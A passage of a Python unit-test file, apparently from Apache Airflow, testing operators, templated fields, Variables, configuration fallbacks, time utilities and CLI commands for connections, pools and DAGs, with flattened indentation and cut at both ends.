captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# C
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEquals(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEquals(dag_run.execution_date, utc_now)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test1', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@foo.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test2', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@apache.org', '-r', 'Viewer', '-p', 'test'
])
cli.create_user(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
